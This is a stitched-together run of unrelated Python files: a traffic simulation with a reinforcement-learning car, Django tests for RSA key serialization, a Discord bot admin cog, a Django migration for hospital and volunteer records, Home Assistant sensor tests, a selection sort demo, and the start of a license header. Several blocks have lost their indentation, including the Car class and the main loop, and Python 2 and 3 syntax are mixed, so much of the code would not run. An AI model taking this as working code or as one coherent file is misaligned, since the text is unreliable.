                    screen.print_at( current_map[x,y].char(), x,y+[k for k,_t in enumerate(self.line_range) if y in _t][-1],
                        **current_map[x,y].repre() )
        # Debug Info
        screen.print_at('%3.3f Secs'%(self.global_time), self.road_length+1,0)
        for i,msg in enumerate(self.message) :
            screen.print_at(msg, self.road_length+1,i+1)
        #msg = '%s'%(current_map)
        #screen.print_at(msg,0,sum(self.line_alloc)+len(self.line_alloc)+1)
class GameObject(object) :
    """Base class for everything placed on the road grid."""
    def __init__(self, x, y):
        # Integer grid position (x, y).
        self.loc = np.array((x, y), np.int32)
        # Objects flagged here are swept from the world after a tick.
        self.remove = False

    def tick(self, delta):
        """Advance internal state by `delta` seconds; base objects are static."""
        pass

    def char(self):
        """Single character drawn for this object."""
        return '*'

    def repre(self):
        """Extra keyword arguments for the renderer's print call."""
        return {}

    def interact(self, other, delta):
        # The result of interaction only affect the "self".
        pass

    def __repr__(self):
        return f'{type(self).__name__}({self.loc[0]:d},{self.loc[1]:d})'
class TrafficLights(GameObject) :
    """Traffic light fixed at column ``x`` on the lights row.

    Cycles yellow -> red -> green on ``time_schedule`` (seconds per state)
    and tickets any Car crossing its column while the light is red."""
    # Renderer colour codes per state index: 0=yellow, 1=red, 2=green
    # (matches get_state's mapping).
    light_color = [3,1,2]
    def __init__(self,x,y=6,time_schedule=[2,5,5],start_time=0.0):
        # NOTE(review): mutable default for time_schedule is shared across
        # instances; harmless while never mutated, but worth confirming.
        GameObject.__init__(self,x,y)
        self.state = 0
        self.time = start_time
        self.time_schedule=time_schedule
    def tick(self,delta) :
        # Advance the clock; roll to the next state when the current
        # state's scheduled duration elapses.  Generator protocol: World
        # iterates the yielded values.
        self.time += delta
        if( self.time >= self.time_schedule[self.state] ) :
            self.time = 0.0
            self.state = (self.state+1)%len(self.time_schedule)
        yield
    def get_state(self) :
        # State index -> colour name (0 yellow, 1 red, otherwise green).
        if(self.state == 0) : return 'yellow'
        elif(self.state == 1 ) : return 'red'
        else : return 'green'
    def char(self) :
        return u'●'
        #return u'0'
    def repre(self) :
        return {'colour':self.light_color[self.state]}
    def _is_crossing(self,car,delta) :
        # True when the car is at, or will pass, this light's column within
        # the next `delta` seconds (sign change of the x-distance).
        dist_a = (self.loc - car.real_loc)[0]
        dist_b = (self.loc - car._predict_loc(delta))[0]
        return dist_a * dist_b <= 0
    def interact(self,other,delta) :
        # Only polices Cars: crossing while red yields a ticket.
        if (isinstance(other,Car)):
            if( self.get_state() == 'red'
               and self._is_crossing(other,delta) ):
                yield ViolateRule('Ticket!')
        yield
class Movable(GameObject) :
    """Marker base class for objects that can move (e.g. cars)."""
    def __init__(self,x,y):
        GameObject.__init__(self,x,y)
class Car(Movable) :
def __init__(self,x=None,y=None,v=None,state=None):
x = x if x is not None else 0
y = y if y is not None else random.randint(World.line_range[1][0],World.line_range[2][-1])
v = float(v if v is not None else random.randint(1,3))
state = state if state is not None else 'go'
Movable.__init__(self,x,y)
self.real_loc = self.loc.astype(np.float32)
self.maximum_vel = v
self.vel = v
self.direction = -1 if y in World.line_range[1] else 1
self.state = state #'go', 'stop', 'park', 'left', 'right'
self.constraint_queue = [] #if it is empty, state change to 'go'
def char(self) :
if( self.state == 'park' ) :
return 'P'
elif( self.vel == 0.0 ) :
return 'S' #completely stopped
elif( self.state == 'go') :
return u'◀' if( self.direction < 0 ) else u'▶'
elif( self.state == 'stop' ) : #stopping...
return u'↤' if( self.direction < 0 ) else u'↦'
elif( self.state == 'left' ):
return u'⬋' if( self.direction < 0 ) else u'⬈'
elif( self.state == 'right' ):
return u'⬉' if( self.direction < 0 ) else u'⬊'
else :
assert(False)
def tick(self,delta) :
if( self.state == 'park' ) :
yield;return
# Update Changing Lane
if( self.state == 'left' or self.state == 'right' ) :
self.real_loc[1] += (self.direction * (-1 if self.state == 'left' else 1))
self.state = 'go'
if( self.real_loc[1] < World.line_range[1][0] or
self.real_loc[1] > World.line_range[2][-1]) :
yield ViolateRule('Car Off Track!%f'%self.real_loc[1])
self.real_loc[1] = max(min(World.line_range[2][-1], self.real_loc[1]),World.line_range[1][0])
# Update Speed
if( self.state == 'go' ) :
self.vel += delta * self.maximum_vel
elif( self.state == 'stop' ) :
self.vel += delta * -self.maximum_vel
self.vel = max(min(self.maximum_vel, self.vel),0.0)
# Update Location
self.real_loc[0] += delta * self.vel * self.direction
if( self.real_loc[0] < 0 ) : self.real_loc[0] += World.road_length
elif( self.real_loc[0] > World.road_length ) : self.real_loc[0] -= World.road_length
self.loc = self.real_loc.astype(np.int32)
yield
def _predict_loc(self,future_secs) :
pre = np.copy(self.real_loc)
pre[0] += future_secs * self.vel * self.direction
return pre
def _is_in_front(self,car) : #Does I in front of other car?
if( self.direction != car.direction ) : return True
d = self._dist(car)
if( self.real_loc[0] > car.real_loc[0] and
self.real_loc[0] - car.real_loc[0] == d ) :
return True if self.direction > 0 else False
elif( self.real_loc[0] > car.real_loc[0] ) :
return False if self.direction > 0 else True
elif( self.real_loc[0] < car.real_loc[0] and
car.real_loc[0] - self.real_loc[0] == d ) :
return False if self.direction > 0 else True
else :
return True if self.direction > 0 else False
def _dist(self,car) :
if( self.direction != car.direction ):
if( self.direction == 1 ) : # and it means car.direction == -1
return abs(car.real_loc[0] - self.real_loc[0])
else :
return abs(self.real_loc[0] - car.real_loc[0])
else :
# choose the short one as dist; due to cycling behavior
_t = abs(car.real_loc[0] - self.real_loc[0])
return min(_t, World.road_length-_t)
    def interact(self,other,delta) :
        """React to another world object (traffic light, car or pedestrian).

        Generator: yields ``ViolateRule`` events (e.g. crashes) or ``None``.
        May change ``self.state`` and queue release-conditions that flip the
        car back to 'go' once every queued condition is satisfied.
        """
        if( self.state == 'park' ) :
            yield;return
        if( len(self.constraint_queue) > 0 ) : # means, it is in the stop state.
            # Drop every constraint that is now satisfied; resume driving
            # only when no blocking condition remains.
            self.constraint_queue = [q for q in self.constraint_queue if q(other) == False]
            if( len(self.constraint_queue) == 0 ):
                self.state = 'go'
        # interact with other cars and pedestrians and traffic lights.
        if (isinstance(other,TrafficLights)) :
            if( self.state == 'go') :
                # Sign change between current and 2s-predicted offsets means
                # the car would cross the light within ~2 seconds.
                dist_a = (other.loc - self.real_loc)[0]
                dist_b = (other.loc - self._predict_loc(2.0))[0]
                crossing = dist_a * dist_b <= 0
                if( crossing ) :
                    if( other.get_state() == 'red' or
                        other.get_state() == 'yellow' ) :
                        self.state = 'stop'
                        # Wait until this same light turns green.
                        self.constraint_queue.append(lambda o: other == o and other.get_state() == 'green')
        elif (isinstance(other,Car)):
            if( (other.loc == self.loc).all() ) :
                yield ViolateRule('Car Crash!')
            if( other.loc[1] == self.loc[1]) : # On the same lane
                if( other._is_in_front(self) ) : #if other car is in front of me
                    # Check the safety distance
                    if( self._dist(other) < 3 and other.vel - self.vel <= 0) :
                        if( other.state == 'park') :
                            # Overtake a parked car by switching lane.
                            self.state = 'left'
                        else :
                            self.state = 'stop'
                            # Resume once a safe gap (> 2 cells) reopens.
                            self.constraint_queue.append(lambda o: other == o and self._dist(other) > 2)
            elif( self._is_in_front(other) and self._dist(other) < 3 and
                  self.vel < other.vel and
                  (self.direction==1 and self.loc[1] == 3 or #TODO: Hard code warning!
                   self.direction==-1 and self.loc[1] == 2)) :
                # A faster car closes in from behind on the passing lane:
                # move back to the right.
                self.state = 'right'
        elif (isinstance(other,Pedestrian)):
            dist_a = (other.loc - self.real_loc)[0]
            dist_b = (other.loc - self._predict_loc(2.0))[0]
            crossing = dist_a * dist_b < 0
            if( crossing ) :
                self.state = 'stop'
                # Wait until the pedestrian has left the world.
                self.constraint_queue.append(lambda o: other.remove)
        yield
class MyCar(Car) :
    """The learner-controlled car.

    Exposes ``set_action``/``get_state_and_reward`` to an external
    reinforcement-learning agent and accumulates penalty events (tickets,
    crashes, off-track excursions) between coarse-grained RL steps.
    """
    def __init__(self,x,y,v):
        Car.__init__(self,x,y,v)
        self.init_state()
    def repre(self) :
        return {'colour':1} #my car is red colored!
    #############
    # Functions for reinforcement learning
    #############
    def set_action(self,action) :
        # This function will be called by reinforcement module(like SARSA
        # algorithm) outside for every time-step. Decide the next action for
        # next timestep.
        assert action == 'go' or action == 'stop' or action == 'left' or action =='right'
        self.state = action
    def tick(self,delta) :
        # Delegate to Car.tick but record off-track violations for the
        # reward computation.
        for e in super(MyCar, self).tick(delta) :
            if( e is not None and 'Off' in e.message ): self._off_track.append(True)
            yield e
    def interact(self,other,delta) :
        # this function will be called every tick(fine-grained time steps)
        # encode the state for timestep(coarse-grained), and accumulate
        # accumulate information for reward.
        if (isinstance(other,TrafficLights)) :
            if( other.get_state() == 'red' and
                other._is_crossing(self,delta)
                ) :
                self._traffic_tickets.append(True)
                yield ViolateRule('Ticket!')
        elif (isinstance(other,Car)):
            # Count each crashed-into car only once per RL step.
            if( (self.loc == other.loc).all() and
                other not in self._hit_cars) :
                self._hit_cars.add(other)
                yield ViolateRule('Car Crash!')
        elif (isinstance(other,Pedestrian)):
            if( other._is_squashing_me(self,delta) ):
                self._hit_pedestrians.append(True)
                yield ViolateRule('Hit Pedestrian!')
        yield
    def init_state(self):
        # accumulated info for calculating reward
        self._traffic_tickets = []
        self._hit_pedestrians = []
        self._hit_cars = set()
        self._off_track = []
        self._prev_loc = self.loc
    def get_state_and_reward(self,world) :
        # This function should be called by reinforcement module(like SARSA
        # algorithm) outside for every timestep.
        # NOTE(review): relies on self._get_state(), which is not defined in
        # this chunk -- presumably provided elsewhere; verify.
        dist_moved = (self.loc[0] - self._prev_loc[0])*self.direction % world.road_length
        reverse_drive = False
        if ( int(self._prev_loc[1]) in World.line_range[1]) :
            reverse_drive = True
        state = self._get_state(world)
        # Reward: forward progress (weighted by lane) minus penalties for
        # wrong-way driving, tickets, pedestrians/cars hit and off-track.
        reward = dist_moved * (0.5 if int(self._prev_loc[1]) == World.line_range[2][1]
                                   else 0.3) + \
                 (-1.5 if reverse_drive else 0.0) + \
                 (np.count_nonzero(np.array(self._traffic_tickets))*-10.0) + \
                 (np.count_nonzero(np.array(self._hit_pedestrians))*-20.0) + \
                 len(self._hit_cars)*-5.0 + \
                 len(self._off_track)*-10.0
                 #int(dist_moved == 0) * (-1.0) + \
        self.init_state()
        return state, reward
class Pedestrian(Movable) :
    """A pedestrian that waits, crosses the road cell by cell, then leaves.

    ``time_schedule`` holds the durations of the three phases
    [wait-before, crossing-timeout, wait-after]; ``time_per_cell`` is the
    crossing speed in seconds per lane cell.
    """
    def __init__(self,x=None,y=None,time_per_cell=1.0,time_schedule=None): #cross_speed=1
        # Avoid the shared-mutable-default-argument pitfall.
        if time_schedule is None:
            time_schedule = [1, 999, 1]
        x = x or random.randint(10,World.road_length-10)
        # BUGFIX: the original expression parsed as
        # ``(y or <top side>) if coin else <bottom side>`` because the
        # conditional expression binds looser than ``or``; an explicitly
        # passed ``y`` was therefore ignored whenever the coin flip chose
        # the bottom side.  Parenthesize so ``y`` always wins when given.
        y = y or (World.line_range[0][-1] if random.randint(0,1) == 0 else World.line_range[3][-1])
        Movable.__init__(self,x,y)
        self.state = 0                       # index into time_schedule
        self.time = 0.0                      # time spent in the current phase
        self.time_per_cell = time_per_cell
        self.time_schedule = time_schedule
        # Target side of the road is the opposite of the starting side.
        self.goal = World.line_range[3][-1] if y == World.line_range[0][-1] else World.line_range[0][-1]
        self.direction = -1 if y > self.goal else 1
    def char(self) : return u'☺'
    def tick(self,delta) :
        """Advance one time step; mark for removal once all phases are done."""
        if( self.state >= len(self.time_schedule) ) :
            self.remove = True
            return
        self.time += delta
        if( self.time >= self.time_schedule[self.state] or self.loc[1] == self.goal ) :
            # Current phase finished (timeout or goal reached): next phase.
            self.time = 0.0
            self.state += 1
        elif( self.state == 1 and self.time >= self.time_per_cell ) :
            # Crossing phase: step one cell towards the goal side.
            self.time = 0.0
            self.loc[1] += self.direction
        yield
    def _is_squashing_me(self,car,delta) :
        """True when ``car`` passes over this pedestrian's cell within ``delta``."""
        dist_a = (self.loc - car.real_loc)[0]
        dist_b = (self.loc - car._predict_loc(delta))[0]
        return self.loc[1] == car.real_loc[1] and dist_a * dist_b <= 0
    def interact(self,other,delta) :
        """Yield a rule violation when a car runs this pedestrian over."""
        if (isinstance(other,Car) and
            self._is_squashing_me(other,delta) ):
            yield ViolateRule('Hit Person!')
        yield
if __name__ == "__main__":
world = World()
world.add_obj(TrafficLights(x=10,time_schedule=[1,1,2]))
#world.add_obj(TrafficLights(x=10))
world.add_obj(TrafficLights(x=70,time_schedule=[1,4,4]))
def main_loop(screen) :
def _seconds(s,continuous=True) :
time = 0.0
while(time <= s) :
world.tick();world.draw(screen);
if(continuous) : screen.refresh()
time += world.time_step
screen.refresh();
world.draw_lines(screen)
go = True
while(True) :
ev = screen.get_key()
if ev in [ord('q')] :
return
elif ev in [ord('s')] and not go:
_seconds(1,continuous=False)
elif ev in [ord('g')]:
go = not go
elif ev in [ord('p')]:
world.add_obj(Pedestrian())
elif ev in [ord('u')]:
world.add_obj(Car(x=random.choice(range(1,99)),y=random.choice([1,4]),v=0,state='park'))
elif ev in [ord('c')]:
car = Car()
world.add_obj(car,True)
elif ev in [ord('l')]:
car.state = 'left'
elif ev in [ord('r')]:
car.state = 'right'
if go :
_seconds(1)
Screen.wrapper(main_loop,arguments=[])
print '*****Debug Information*****'
# coding: utf-8
from django.test import TestCase
from cryptography.hazmat.primitives.asymmetric import rsa
from bounca.certificate_engine.ssl.key import Key
class KeyTest(TestCase):
    """Unit tests for the certificate engine's RSA ``Key`` wrapper:
    key generation, PEM (de)serialization with and without a passphrase,
    and passphrase checking."""
    def test_generate_private_key_2048(self):
        # create_key() populates the handler's ``key`` attribute in place.
        keyhandler = Key()
        keyhandler.create_key(2048)
        self.assertEqual(keyhandler.key.key_size, 2048)
        pkey = keyhandler.key.public_key()
        self.assertIsInstance(pkey.public_numbers(), rsa.RSAPublicNumbers)
    def test_generate_private_key_4096(self):
        # create_key() also returns a handler, allowing call chaining.
        prvkey = Key().create_key(4096)
        self.assertEqual(prvkey.key.key_size, 4096)
        pkey = prvkey.key.public_key()
        self.assertIsInstance(pkey.public_numbers(), rsa.RSAPublicNumbers)
    def test_serialize_keys_passphrase(self):
        # Round-trip: serialize encrypted, load with the same passphrase.
        key = Key()
        key.create_key(4096)
        pem = key.serialize(b'test_store_keys_passphrase')
        prvkey = key.load(pem, b'test_store_keys_passphrase')
        self.assertIsInstance(prvkey.key, rsa.RSAPrivateKey)
        self.assertEqual(prvkey.key.key_size, 4096)
    def test_store_keys_no_object(self):
        # Serializing before create_key() must fail loudly.
        key = Key()
        with self.assertRaisesMessage(RuntimeError, "No key object"):
            key.serialize(b'test_store_keys_passphrase')
    def test_store_keys_no_passphrase(self):
        # Unencrypted PEM round-trip through a fresh handler.
        key = Key()
        key.create_key(2048)
        pem = key.serialize()
        key = Key()
        prvkey = key.load(pem)
        self.assertIsInstance(prvkey.key, rsa.RSAPrivateKey)
        self.assertEqual(prvkey.key.key_size, 2048)
    def test_store_keys_wrong_passphrase(self):
        # Loading with the wrong passphrase must raise.
        key = Key()
        key.create_key(2048)
        pem = key.serialize(b'test_store_keys_wrong_passphrase')
        with self.assertRaisesMessage(ValueError, 'Bad decrypt. Incorrect password?'):
            key.load(pem, b'test_store_keys_passphrase')
    def test_check_passphrase_valid(self):
        key = Key()
        key.create_key(2048)
        pem = key.serialize(b'check_passphrase')
        self.assertTrue(key.check_passphrase(pem, b'check_passphrase'))
    def test_check_passphrase_invalid(self):
        key = Key()
        key.create_key(2048)
        pem = key.serialize(b'test_check_passphrase_invalid')
        self.assertFalse(key.check_passphrase(pem, b'check_passphrase'))
from discord.ext import commands
import discord
import asyncio
import logging
class AdminUtilsCog(commands.Cog, name="Admin Utilities"):
"""Cog for administrative commands, be these for users or to manage the bot.
All commands within this cog require administrative permissions or admin-like roles
"""
def __init__(self, bot):
self.bot = bot
self.db_conn_cog = None
self.logger = logging.getLogger("SVGEBot.AdminUtils")
self.delete_message_after = self.bot.bot_config["delete_msg_after"]
self.logger.info("Loaded AdminUtils")
@commands.Cog.listener()
async def on_ready(self):
self.db_conn_cog = self.bot.get_cog("DBConnPool")
async def cog_check(self, ctx):
"""This method is a cog wide check to ensure users have "admin" roles,
It will be called without the need for check decorators on every command.
"""
for role in ctx.message.author.roles:
if role.id in self.bot.bot_config["admin_role_id_list"]:
return True
return False
def cog_unload(self):
self.logger.info("Unloaded AdminUtils")
@commands.command()
async def shutdown(self, ctx):
"""Shuts the bot process down gracefully."""
await ctx.send(":wave:", delete_after=1)
try:
await self.db_conn_cog.shutdown()
except NameError:
pass
await asyncio.sleep(2)
await self.bot.logout()
self.logger.info("Logged out and closed Discord API connection")
self.logger.info("Closing process")
# This sleep is to avoid background loops getting messed with by an
# abrupt exit.
await asyncio.sleep(4)
exit(0)
@commands.command()
async def change_presence(self, ctx, activity, text=">>help"):
"""Changes the bot "presence" statement to that defined in command,
permitting it is one of those permitted by discord.
Command originally written for CyclopsBot by JayDwee.
:arg ctx: Command context, auto-filled by API wrapper.
:arg activity: Activity for the bot to display, must be one of:
:arg text: Text following the activity term"""
activity_list = {
"watching": discord.ActivityType.watching,
"streaming": discord.ActivityType.streaming,
"playing": discord.ActivityType.playing,
"listening": discord.ActivityType.listening
}
if activity.lower() not in activity_list.keys():
await ctx.send(f'"{activity}" is an invalid activity. "WatchingW, "streaming", '
f'"playing", and "listening" are currently supported',
delete_after=self.bot.delete_msg_after)
return
activity_type_to_show = discord.Activity(activity=activity_list[activity.lower()],
name=text)
await self.bot.change_presence(activity=activity_type_to_show)
self.logger.info(f"Activity changed to {activity} {text}")
await ctx.send(f"Activity changed as requested.", delete_after=self.bot.delete_msg_after)
def setup(bot):
    """discord.py extension entry point: register this cog on ``bot``."""
    bot.add_cog(AdminUtilsCog(bot))
# Generated by Django 3.2 on 2021-04-26 01:27
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial schema for the ``core`` app: City, Facility,
    State, Volunteer, Service, Hospital and Experience models."""

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Cities (linked to a State via the AddField at the bottom).
        migrations.CreateModel(
            name='City',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=120)),
                ('verified', models.BooleanField(default=False)),
            ],
            options={
                'verbose_name_plural': 'Cities',
            },
        ),
        # Kinds of help a volunteer/service can provide.
        migrations.CreateModel(
            name='Facility',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=128)),
                ('description', models.TextField()),
                ('deliver', models.BooleanField(default=False)),
            ],
            options={
                'verbose_name_plural': 'Facilities',
            },
        ),
        migrations.CreateModel(
            name='State',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
            ],
            options={
                'verbose_name_plural': 'States',
            },
        ),
        # Volunteers: optionally tied to an auth user, with availability hours.
        migrations.CreateModel(
            name='Volunteer',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=128)),
                ('mobile', models.CharField(max_length=15, unique=True)),
                ('alternate_mobile', models.CharField(blank=True, max_length=15, null=True)),
                ('available_from', models.TimeField(blank=True, null=True)),
                ('available_till', models.TimeField(blank=True, null=True)),
                ('verified', models.BooleanField(default=False)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('note', models.TextField(blank=True, null=True)),
                ('city', models.ManyToManyField(to='core.City')),
                # NOTE(review): null=True has no effect on ManyToManyField
                # (Django warning fields.W340).
                ('facilities', models.ManyToManyField(null=True, to='core.Facility')),
                ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name_plural': 'Volunteers',
            },
        ),
        # A service/provider listing with contact details and location.
        migrations.CreateModel(
            name='Service',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=256, null=True)),
                ('contact_person', models.CharField(blank=True, max_length=150, null=True)),
                ('mobile', models.CharField(max_length=15)),
                ('alternate_mobile', models.CharField(blank=True, max_length=15, null=True)),
                ('address', models.TextField(blank=True, null=True)),
                ('verified', models.BooleanField(default=True)),
                ('note', models.TextField(blank=True, null=True)),
                ('lat', models.FloatField(blank=True, null=True)),
                ('long', models.FloatField(blank=True, null=True)),
                ('deliver_at_doorstep', models.BooleanField(default=False)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('requested_verification', models.BooleanField(default=False)),
                ('emergency_contact', models.CharField(blank=True, max_length=50, null=True)),
                ('opening_time', models.TimeField(blank=True, null=True)),
                ('closing_time', models.TimeField(blank=True, null=True)),
                ('request_edit', models.BooleanField(default=False)),
                ('edit', models.TextField(blank=True, null=True)),
                ('city', models.ManyToManyField(to='core.City')),
                ('facility', models.ManyToManyField(to='core.Facility')),
            ],
        ),
        # Hospitals with total/available bed, ventilator and ICU counts.
        migrations.CreateModel(
            name='Hospital',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=500)),
                ('mobile', models.CharField(max_length=15, unique=True)),
                ('alternate_mobile', models.CharField(blank=True, max_length=15, null=True)),
                ('address', models.TextField(blank=True, null=True)),
                ('verified', models.BooleanField(default=True)),
                ('lat', models.FloatField(blank=True, null=True)),
                ('long', models.FloatField(blank=True, null=True)),
                ('total_oxygen_beds', models.PositiveSmallIntegerField(blank=True, null=True)),
                ('total_ventilators', models.PositiveSmallIntegerField(blank=True, null=True)),
                ('total_icu', models.PositiveSmallIntegerField(blank=True, null=True)),
                ('available_oxygen_beds', models.PositiveSmallIntegerField(blank=True, null=True)),
                ('available_ventilators', models.PositiveSmallIntegerField(blank=True, null=True)),
                ('available_icu', models.PositiveSmallIntegerField(blank=True, null=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('requested_verification', models.BooleanField(default=False)),
                ('emergency_contact', models.CharField(blank=True, max_length=50, null=True)),
                ('opening_time', models.TimeField(blank=True, null=True)),
                ('closing_time', models.TimeField(blank=True, null=True)),
                ('request_edit', models.BooleanField(default=False)),
                ('edit', models.TextField(blank=True, null=True)),
                ('city', models.ManyToManyField(to='core.City')),
            ],
        ),
        # User-submitted experience reports about a Service.
        migrations.CreateModel(
            name='Experience',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=150)),
                ('mobile', models.CharField(blank=True, max_length=16, null=True)),
                ('alternate_mobile', models.CharField(blank=True, max_length=16, null=True)),
                ('experience', models.TextField()),
                ('experienced_on', models.DateTimeField(blank=True, null=True)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('available', models.BooleanField(default=True)),
                ('visible', models.BooleanField(default=True)),
                ('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.service')),
            ],
        ),
        # Added after City creation because State is declared later above.
        migrations.AddField(
            model_name='city',
            name='state',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.state'),
        ),
    ]
"""Tests for the srp_energy sensor platform."""
from unittest.mock import MagicMock
from homeassistant.components.sensor import STATE_CLASS_TOTAL_INCREASING
from homeassistant.components.srp_energy.const import (
ATTRIBUTION,
DEFAULT_NAME,
ICON,
SENSOR_NAME,
SENSOR_TYPE,
SRP_ENERGY_DOMAIN,
)
from homeassistant.components.srp_energy.sensor import SrpEntity, async_setup_entry
from homeassistant.const import (
ATTR_ATTRIBUTION,
DEVICE_CLASS_ENERGY,
ENERGY_KILO_WATT_HOUR,
)
async def test_async_setup_entry(hass):
    """Test that the sensor platform sets up from a config entry."""
    fake_async_add_entities = MagicMock()
    fake_srp_energy_client = MagicMock()
    # Fake usage rows as returned by the srpenergy client.
    fake_srp_energy_client.usage.return_value = [{1, 2, 3, 1.999, 4}]
    fake_config = MagicMock(
        data={
            "name": "SRP Energy",
            "is_tou": False,
            "id": "0123456789",
            "username": "<EMAIL>",
            "password": "<PASSWORD>",
        }
    )
    hass.data[SRP_ENERGY_DOMAIN] = fake_srp_energy_client
    await async_setup_entry(hass, fake_config, fake_async_add_entities)
async def test_async_setup_entry_timeout_error(hass):
    """Test setup when fetching usage data raises TimeoutError.

    The first coordinator refresh fails, so ``last_update_success`` is False.
    """
    fake_async_add_entities = MagicMock()
    fake_srp_energy_client = MagicMock()
    fake_srp_energy_client.usage.return_value = [{1, 2, 3, 1.999, 4}]
    fake_config = MagicMock(
        data={
            "name": "SRP Energy",
            "is_tou": False,
            "id": "0123456789",
            "username": "<EMAIL>",
            "password": "<PASSWORD>",
        }
    )
    hass.data[SRP_ENERGY_DOMAIN] = fake_srp_energy_client
    fake_srp_energy_client.usage.side_effect = TimeoutError()
    await async_setup_entry(hass, fake_config, fake_async_add_entities)
    # The entity is still added, but its coordinator records the failure.
    assert not fake_async_add_entities.call_args[0][0][
        0
    ].coordinator.last_update_success
async def test_async_setup_entry_connect_error(hass):
    """Test setup when fetching usage data raises ValueError.

    Simulates a connection/parse failure on the first refresh, so
    ``last_update_success`` is False.
    """
    fake_async_add_entities = MagicMock()
    fake_srp_energy_client = MagicMock()
    fake_srp_energy_client.usage.return_value = [{1, 2, 3, 1.999, 4}]
    fake_config = MagicMock(
        data={
            "name": "SRP Energy",
            "is_tou": False,
            "id": "0123456789",
            "username": "<EMAIL>",
            "password": "<PASSWORD>",
        }
    )
    hass.data[SRP_ENERGY_DOMAIN] = fake_srp_energy_client
    fake_srp_energy_client.usage.side_effect = ValueError()
    await async_setup_entry(hass, fake_config, fake_async_add_entities)
    assert not fake_async_add_entities.call_args[0][0][
        0
    ].coordinator.last_update_success
async def test_srp_entity(hass):
    """Test the SrpEntity's static properties and post-add state."""
    # Coordinator data is the raw kWh total; usage should render rounded.
    fake_coordinator = MagicMock(data=1.99999999999)
    srp_entity = SrpEntity(fake_coordinator)
    srp_entity.hass = hass

    assert srp_entity is not None
    assert srp_entity.name == f"{DEFAULT_NAME} {SENSOR_NAME}"
    assert srp_entity.unique_id == SENSOR_TYPE
    # No native state until async_added_to_hass has run.
    assert srp_entity.state is None
    assert srp_entity.unit_of_measurement == ENERGY_KILO_WATT_HOUR
    assert srp_entity.icon == ICON
    assert srp_entity.usage == "2.00"
    assert srp_entity.should_poll is False
    assert srp_entity.extra_state_attributes[ATTR_ATTRIBUTION] == ATTRIBUTION
    assert srp_entity.available is not None
    assert srp_entity.device_class == DEVICE_CLASS_ENERGY
    assert srp_entity.state_class == STATE_CLASS_TOTAL_INCREASING

    await srp_entity.async_added_to_hass()
    assert srp_entity.state is not None
    # The entity registers itself as a coordinator listener on add.
    assert fake_coordinator.async_add_listener.called
    assert not fake_coordinator.async_add_listener.data.called
async def test_srp_entity_no_data(hass):
    """Test that extra_state_attributes is None when the coordinator has no data."""
    fake_coordinator = MagicMock(data=False)
    srp_entity = SrpEntity(fake_coordinator)
    srp_entity.hass = hass
    assert srp_entity.extra_state_attributes is None
async def test_srp_entity_no_coord_data(hass):
    """Test that usage is None when the coordinator has no data."""
    fake_coordinator = MagicMock(data=False)
    srp_entity = SrpEntity(fake_coordinator)
    srp_entity.hass = hass
    assert srp_entity.usage is None
async def test_srp_entity_async_update(hass):
    """Test that async_update requests a coordinator refresh."""

    async def async_magic():
        pass

    # NOTE(review): this patches MagicMock.__await__ globally (class level),
    # so every MagicMock becomes awaitable for the rest of the test session.
    MagicMock.__await__ = lambda x: async_magic().__await__()
    fake_coordinator = MagicMock(data=False)
    srp_entity = SrpEntity(fake_coordinator)
    srp_entity.hass = hass

    await srp_entity.async_update()
    assert fake_coordinator.async_request_refresh.called
def selection(arr):
    """Sort ``arr`` in place in ascending order using selection sort."""
    n = len(arr)
    for pos in range(n):
        # Locate the smallest element in the unsorted tail arr[pos:].
        smallest = pos
        for candidate in range(pos + 1, n):
            if arr[candidate] < arr[smallest]:
                smallest = candidate
        # Move it into its final position.
        arr[pos], arr[smallest] = arr[smallest], arr[pos]
if __name__ == '__main__':
    # Demo fixtures (sorted in place, so the second pass sees sorted input).
    arrs = [
        [4, 3, 3, 7, 6, -1, 10, 3, 8, 4],
        [10, 11, 9, 8, 13, 21],
        [-1, -1]
    ]
    print("Selection sort")
    for arr in arrs:
        print("----------------------------------------")
        print("unsorted: {}".format(arr))
        selection(arr)
        print("sorted: {}".format(arr))
    print("\n")
    # NOTE(review): this second pass is identical to the first and runs on
    # the already-sorted lists (so "unsorted" prints sorted data) --
    # presumably a copy-paste leftover; confirm whether it is intentional.
    print("Selection sort")
    for arr in arrs:
        print("----------------------------------------")
        print("unsorted: {}".format(arr))
        selection(arr)
        print("sorted: {}".format(arr))
# Copyright 2018 Digital Domain 3.0
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
